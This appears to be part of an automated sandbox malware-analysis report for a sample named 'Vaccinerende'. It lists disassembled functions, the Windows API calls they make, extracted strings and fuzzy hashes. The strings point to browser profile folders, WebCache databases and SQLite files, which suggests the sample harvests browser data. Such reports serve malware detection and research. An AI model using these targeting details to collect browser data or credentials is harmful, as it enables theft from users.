                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                              • String ID:
                                                                              • API String ID: 2941347001-0
                                                                              • Opcode ID: 0a22d4763c93248a77a6dd38a703ed3c9df3f9550cf1aabc5898569e7f0c3cb4
                                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                              • Opcode Fuzzy Hash: 0a22d4763c93248a77a6dd38a703ed3c9df3f9550cf1aabc5898569e7f0c3cb4
                                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                              APIs
                                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                              • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                                                                              • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                                                                              • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                                                                              • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                              • String ID: advapi32.dll
                                                                              • API String ID: 2012295524-4050573280
                                                                              • Opcode ID: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                              • Opcode Fuzzy Hash: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00403C09
                                                                              • memset.MSVCRT ref: 00403C1E
                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                              • wcscat.MSVCRT ref: 00403C47
                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                              • wcscat.MSVCRT ref: 00403C70
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                              • API String ID: 1534475566-1174173950
                                                                              • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                              • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                              APIs
                                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00412794,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00414BA4
                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                              • memset.MSVCRT ref: 00414C87
                                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                              • API String ID: 71295984-2036018995
                                                                              • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                              • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                              APIs
                                                                              • wcschr.MSVCRT ref: 00414458
                                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                              • String ID: "%s"
                                                                              • API String ID: 1343145685-3297466227
                                                                              • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                              • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CCF
                                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                                              • String ID: GetProcessTimes$kernel32.dll
                                                                              • API String ID: 1714573020-3385500049
                                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004087D6
                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                              • memset.MSVCRT ref: 00408828
                                                                              • memset.MSVCRT ref: 00408840
                                                                              • memset.MSVCRT ref: 00408858
                                                                              • memset.MSVCRT ref: 00408870
                                                                              • memset.MSVCRT ref: 00408888
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                              • String ID:
                                                                              • API String ID: 2911713577-0
                                                                              • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                              • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcmp
                                                                              • String ID: @ $SQLite format 3
                                                                              • API String ID: 1475443563-3708268960
                                                                              • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                              • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmpqsort
                                                                              • String ID: /nosort$/sort
                                                                              • API String ID: 1579243037-1578091866
                                                                              • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                              • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040E60F
                                                                              • memset.MSVCRT ref: 0040E629
                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                              Strings
                                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                              • API String ID: 2887208581-2114579845
                                                                              • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                              • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                              APIs
                                                                              • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                              • String ID:
                                                                              • API String ID: 3473537107-0
                                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                              APIs
                                                                              • ??3@YAXPAX@Z.MSVCRT(00650048), ref: 0044DF01
                                                                              • ??3@YAXPAX@Z.MSVCRT(007B7790), ref: 0044DF11
                                                                              • ??3@YAXPAX@Z.MSVCRT(007B7FA0), ref: 0044DF21
                                                                              • ??3@YAXPAX@Z.MSVCRT(007B7B98), ref: 0044DF31
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??3@
                                                                              • String ID:
                                                                              • API String ID: 613200358-0
                                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                              APIs
                                                                              Strings
                                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset
                                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                              • API String ID: 2221118986-1725073988
                                                                              • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                              • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                              APIs
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00412794,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00414BA4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                              • API String ID: 2773794195-880857682
                                                                              • Opcode ID: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                              • Opcode Fuzzy Hash: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@
                                                                              • String ID:
                                                                              • API String ID: 1033339047-0
                                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                              APIs
                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                              • memcmp.MSVCRT ref: 00444BA5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$memcmp
                                                                              • String ID: $$8
                                                                              • API String ID: 2808797137-435121686
                                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                              APIs
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                              • _mbscat.MSVCRT ref: 0040525B
                                                                              • GetProcAddress.KERNEL32(0045DBE0,0045E298,00000060,00000000), ref: 00405266
                                                                                • Part of subcall function 00405211: GetProcAddress.KERNEL32(0045DBE0,?,00405282,00000000), ref: 00405217
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                              • String ID:
                                                                              • API String ID: 966727022-0
                                                                              • Opcode ID: c765794f54d76aa96f7cbbd704376dd7e24dc159ae60cf9a2403a0e69002e1a0
                                                                              • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                              • Opcode Fuzzy Hash: c765794f54d76aa96f7cbbd704376dd7e24dc159ae60cf9a2403a0e69002e1a0
